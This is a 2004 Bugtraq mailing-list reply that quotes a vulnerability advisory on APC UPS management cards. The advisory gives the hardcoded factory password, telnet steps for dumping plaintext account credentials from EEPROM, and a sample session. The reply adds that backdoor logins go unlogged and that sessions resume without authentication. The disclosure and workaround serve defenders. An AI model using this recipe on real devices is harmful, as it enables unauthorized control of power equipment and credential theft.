'Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"
From:       brandon pierce <brandonp () insynclh ! com>
Date:       2004-02-18 16:58:43
Message-ID: 20040218165843.31118.qmail () www ! securityfocus ! com
[Download message RAW]

In-Reply-To: <1076930672.19026.88.camel@localhost.localdomain>

Just tested on a client's Symmetra RM 12000 and had some interesting results with the \
following setup:

Model Number:           AP9617
Manufacture Date:       12/20/2002
Hardware Revision:      A10

Symmetra APP Ver:       120
Symmetra APP Date:      12/09/2002

AOS Card Ver:   120
AOS Card Date:  12/10/2002

There are a few side notes that should be noted:

The backdoor login does NOT show up in the event log for the system.

If the telnet session using the backdoor login is terminated with ^] then the session \
can be resumed simply by using telnet to sign back in with NO authentication. This \
even works if attempting to resume the session from a different IP address.

> *** Background:
> APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
> supply) products have a Web and SNMP management card installed that permits
> local serial console, TELNET, web and SNMP management, monitoring and
> mains power control of attached devices.
> 
> 
> *** The Problem:
> APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
> be abused to extract plain text username/password details for all accounts
> and hence gain unauthorised full control of the device.
> 
> Tested vulnerable:
> SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
> MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0
> 
> 
> *** Description:
> The "backdoor" password is designed for use by the factory for initial
> configuration of the card, e.g. MAC Address, Serial Number etc. However, it
> is possible to dump the contents of EEPROM which amongst other things
> stores the account usernames and passwords.
> 
> The "backdoor" password is accepted via either the local serial port or
> TELNET. Use of the password on the web interface does not appear to be
> possible.
> 
> 
> *** To recreate (typical example):
> Connect a console to the serial port or TELNET to the card. At the username
> prompt use any username. The password is all alphabetic characters and is
> case sensitive: TENmanUFactOryPOWER
> 
> At the selection prompt, type 13 and press return. Type the byte address of
> the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
> the username and password pairs. Different firmware revisions may have the
> account details at different EEPROM locations. The accounts in the example
> below are the default accounts after their passwords have been changed.
> Username: apc		Password: BBCCDDEEF
> Username: device	Password: AAAABBBBB
> 
> Press return to get back to the Factory Menu and press ctrl-A to logout.
> You can now TELNET to the card again and use the account details you've
> just recovered to log into and control the device.
> 
> You should use the other selections with extreme care. You may cause
> irrepairable damage and will most certainly invalidate any warranty.
> The EEPROM also contains other user-configurable options in either plain
> text or binary encoded form. They are not detailed in this advisory.
> 
> Example:
> 
> [root@always root]# telnet 192.168.1.1
> Trying 192.168.1.1...
> Connected to 192.168.1.1.
> Escape character is '^]'.
> 
> User Name : phade
> Password  : TENmanUFactOryPOWER
> 
> Factory Menu
> <CTRL-A> to exit
> 
> 1AP9606
> 2WA0044004472
> 3G9
> 410/25/2000
> 500 C0 B7 A2 C8 2D
> 6v3.2.1
> 7A
> 8A
> 9192.168.1.1
> A255.255.255.0
> B192.168.1.254
> C
> D
> E
> F
> G
> 
> Selection> 13
> 
> Enter byte address in Hex(XXXX): 1d0
> 
> 01D0   FF 50 46 61 70 63 00 FF  .PFapc..
> 01D8   FF FF FF FF FF FF 42 42  ......BB
> 01E0   43 43 44 44 45 45 46 00  CCDDEEF.
> 01E8   FF 64 65 76 69 63 65 00  .device.
> 01F0   FF FF FF FF 41 41 41 41  ....AAAA
> 01F8   42 42 42 42 42 00 FF 61  BBBBB..a
> 0200   64 6D 69 6E 20 75 73 65  dmin use
> 0208   72 20 70 68 72 61 73 65  r phrase
> 0210   00 FF FF FF FF FF FF FF  ........
> 0218   FF FF FF FF FF FF FF FF  ........
> 0220   64 65 76 69 63 65 20 75  device u
> 0228   73 65 72 20 70 68 72 61  ser phra
> 0230   73 65 00 FF FF FF FF FF  se......
> 0238   FF FF FF FF FF FF FF FF  ........
> 0240   FF 00 00 FF FF FF FF 21  .......!
> 0248   56 00 00 00 00 00 00 55  V......U
> 
> <sp>nxt,b-bck,p-pch,other-exit
> 
> 
> *** Workaround/fix: 
> Ensure that access to the local serial port is physically restricted and
> disable the TELNET interface as described in the device documentation. A
> patched version of the firmware which requires the management password
> to be entered before accessing the factory settings may be available
> from APC.
> 
> 
> *** Vendor status:
> APC were first notified six months ago on 12th August 2003 and were
> initially helpful in patching the problem. However, after testing a couple
> of beta fixes I've heard nothing for over 3 months.
> 
> Dave Tarbatt,
> http://null.sniffing.net/
> 
> 
> --=-KV1stT8YdRNcY3VGzrOj--
> 
> 


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Donate | Add a list | Sponsors: 10East, KoreLogic, Terra-International